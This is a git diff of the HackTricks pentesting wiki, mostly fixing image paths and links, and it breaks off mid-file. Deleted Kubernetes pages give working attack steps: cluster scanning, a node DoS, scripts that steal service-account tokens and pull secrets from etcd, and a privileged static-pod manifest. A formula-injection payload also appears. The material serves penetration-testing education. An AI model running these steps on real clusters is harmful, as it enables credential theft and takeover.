company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? 
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %} ## Automatic Enumeration & Escape @@ -495,8 +489,8 @@ Like in the following examples: You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access): -{% content-ref url="../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) +{% content-ref url="broken-reference" %} +[Broken link](broken-reference) {% endcontent-ref %} ### hostIPC @@ -514,17 +508,11 @@ If you only have `hostIPC=true`, you most likely can't do much. 
If any process o The second technique explained in the post [https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). - - - - -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %} ## CVEs @@ -569,26 +557,20 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket) * [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4) -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md index b2b06adbf..cc20ee029 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -142,7 +142,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 3113f2c56..d58b67ff1 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -723,7 +723,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 
-![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index d8073e5a6..1f739c2ba 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -99,7 +99,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**H2 - Java SQL database**](h2-java-sql-database.md) * [**IIS tricks**](iis-internet-information-services.md) * [**JBOSS**](jboss.md) -* [**Jenkins**](../../cloud-security/jenkins.md) +* [**Jenkins**](broken-reference) * [**Jira**](jira.md) * [**Joomla**](joomla.md) * [**JSP**](jsp.md) diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index 1e0ade9a8..c2a59cb7f 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -332,7 +332,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (2).png>) It means that the server **didn't receive the 
correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index 32a878791..2462c0d53 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -185,7 +185,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) +![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -211,7 +211,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/pentesting-web/formula-doc-latex-injection.md b/pentesting-web/formula-doc-latex-injection.md index 7414b872c..3a798ff65 100644 --- a/pentesting-web/formula-doc-latex-injection.md +++ b/pentesting-web/formula-doc-latex-injection.md @@ -55,7 +55,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) 
+![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### More diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index b337f32b5..0673d970f 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -22,7 +22,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (3).png>) ## Tool diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 2008c32cd..9b78a9a4a 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -195,13 +195,13 @@ Some **examples**: ## WAF bypass encoding image -![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg) +![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg) ## Injecting inside raw HTML When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. 
**Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using `-->` or `--!>`**_ +_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: diff --git a/pentesting/pentesting-kubernetes/README.md b/pentesting/pentesting-kubernetes/README.md deleted file mode 100644 index f90e9649d..000000000 --- a/pentesting/pentesting-kubernetes/README.md +++ /dev/null @@ -1,112 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -# Pentesting Kubernetes - -## From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-from-the-outside.md" %} -[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md) -{% endcontent-ref %} - -## Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -## Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. 
If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/namespace-escalation.md" %} -[namespace-escalation.md](../../cloud-security/pentesting-kubernetes/namespace-escalation.md) -{% endcontent-ref %} - -## From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able to move to other clouds. This is because in clouds like AWS or GCP it is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -# Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -# Hardening Kubernetes - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md deleted file mode 100644 index dc3c52326..000000000 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ /dev/null @@ -1,374 +0,0 @@ -# Attacking Kubernetes from inside a Pod - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## **Pod Breakout** - -**If you are lucky enough you may be able to escape from it to the node:** - -![](https://sickrov.github.io/media/Screenshot-161.jpg) - -### Escaping from the pod - -In order to try to escape from the pod you might need to **escalate privileges** first, some techniques to do it: - -{% content-ref url="../../linux-hardening/privilege-escalation/" %} -[privilege-escalation](../../linux-hardening/privilege-escalation/) -{% endcontent-ref %} - -You can check these **docker breakouts to try to escape** from a pod you have compromised: - -{% content-ref url="../../linux-hardening/privilege-escalation/docker-breakout/" %} -[docker-breakout](../../linux-hardening/privilege-escalation/docker-breakout/) -{% endcontent-ref %} - -### Abusing Kubernetes Privileges - -As explained in the section about **kubernetes enumeration**: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in: - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Abusing Cloud Privileges - -If the pod is run inside a **cloud environment** you might be able to **leak a token from the metadata endpoint** and escalate privileges using it. 
- -## Search vulnerable network services - -As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **search potentially vulnerable services.** - -### Services - -**For this purpose, you can try to get all the services of the kubernetes environment:** - -``` -kubectl get svc --all-namespaces -``` - -By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces. - -### Scanning - -The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster: - -```bash -sudo apt-get update -sudo apt-get install nmap -nmap-kube () -{ - nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}" -} - -nmap-kube-discover () { - local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,'); - local SERVER_RANGES=" "; - SERVER_RANGES+="10.0.0.1 "; - SERVER_RANGES+="10.0.1.* "; - SERVER_RANGES+="10.*.0-1.* "; - nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}" -} -nmap-kube-discover -``` - -Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**: - -{% content-ref url="pentesting-kubernetes-from-the-outside.md" %} -[pentesting-kubernetes-from-the-outside.md](pentesting-kubernetes-from-the-outside.md) -{% endcontent-ref %} - -### Sniffing - -In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials sent from the other pods **sniffing local communications.** 
- -## Network Spoofing - -By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET\_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\ -Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md" %} -[kubernetes-network-attacks.md](../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) -{% endcontent-ref %} - -## Node DoS - -There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment. - -This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng): - -``` -stress-ng --vm 2 --vm-bytes 2G --timeout 30s -``` - -You can see the difference between while running `stress-ng` and after - -```bash -kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx -``` - -![Scenario 13 kubectl top](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-13-3.png) - -## Node Post-Exploitation - -If you managed to **escape from the container** there are some interesting things you will find in the node: - -* The **Container Runtime** process (Docker) -* More **pods/containers** running in the node you can abuse like this one (more tokens) -* The whole **filesystem** and **OS** in general -* The **Kube-Proxy** service listening -* The **Kubelet** service listening. 
Check config files: - * Directory: - * `/var/lib/kubelet/kubeconfig` - * `/var/lib/kubelet/kubelet.conf` - * `/var/lib/kubelet/config.yaml` - * `/var/lib/kubelet/kubeadm-flags.env` - * `/etc/kubernetes/kubelet-kubeconfig` - * `/etc/kubernetes/kubelet.conf` - * `/etc/kubernetes/admin.conf` - * `/etc/kubernetes/controller-manager.conf` - * `/etc/kubernetes/scheduler.conf` - * Other **kubernetes common files**: - * `$HOME/.kube/config` - **User Config** - * `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap Config** - * `/etc/kubernetes/manifests/etcd.yaml` - **etcd Configuration** - * `/etc/kubernetes/pki` - **Kubernetes Key** - -### Find node kubeconfig - -If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: - -``` -ps -ef | grep kubelet -root 1406 1 9 11:55 ? 00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal -``` - -### Steal Secrets - -```bash -# Check Kubelet privileges -kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system - -# Steal the tokens from the pods running in the node -# The most interesting one is probably the one of kube-system -ALREADY="IinItialVaaluE" -for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do - TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) - if ! 
[ $(echo $TOKEN | grep -E $ALREADY) ]; then - ALREADY="$ALREADY|$TOKEN" - echo "Directory: $i" - echo "Namespace: $(cat $i)" - echo "" - echo $TOKEN - echo "================================================================================" - echo "" - fi -done -``` - -The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1): - -```bash -./can-they.sh -i "--list -n default" -./can-they.sh -i "list secrets -n kube-system"// Some code -``` - -### Pivot to Cloud - -If the cluster is managed by a cloud service, usually the **Node will have a different access to the metadata** endpoint than the Pod. Therefore, try to **access the metadata endpoint from the node** (or from a pod with hostNetwork to True): - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -### Steal etcd - -If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**: - -``` -kubectl get nodes -NAME STATUS ROLES AGE VERSION -k8s-control-plane Ready master 93d v1.19.1 -k8s-worker Ready 93d v1.19.1 -``` - -control-plane nodes have the **role master** and in **cloud managed clusters you won't be able to run anything in them**. - -#### Read secrets from etcd - -If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 
- -Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. - -**Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)** - -``` -root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir -``` - -Output: - -```bash -data-dir=/var/lib/etcd -``` - -**View the data in etcd database:** - -```bash -strings /var/lib/etcd/member/snap/db | less -``` - -**Extract the tokens from the database and show the service account name** - -```bash -db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done -``` - -**Same command, but some greps to only return the default token in the kube-system namespace** - -```bash -db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default -``` - -Output: - -``` -1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] -``` - -### Static/Mirrored Pods - -If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**. This basically means that if you get to the node you could be able to **compromise the whole cluster**. 
However, nothe that according to the documentation: _The spec of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc)_. - -In order to create a static pod you may just need to **save the yaml configuration of the pod in `/etc/kubernetes/manifests`**. The **kubelet service** will automatically talk to the API server to **create the pod**. The API server therefore will be able to see that the pod is running but it cannot manage it. The Pod names will be suffixed with the node hostname with a leading hyphen. - -The **path to the folder** where you should write the pods is given by the parameter **`--pod-manifest-path` of the kubelet process**. If it isn't set you might need to set it and restart the process to abuse this technique. - -**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: bad-priv2 - namespace: kube-system -spec: - containers: - - name: bad - hostPID: true - image: gcr.io/shmoocon-talk-hacking/brick - stdin: true - tty: true - imagePullPolicy: 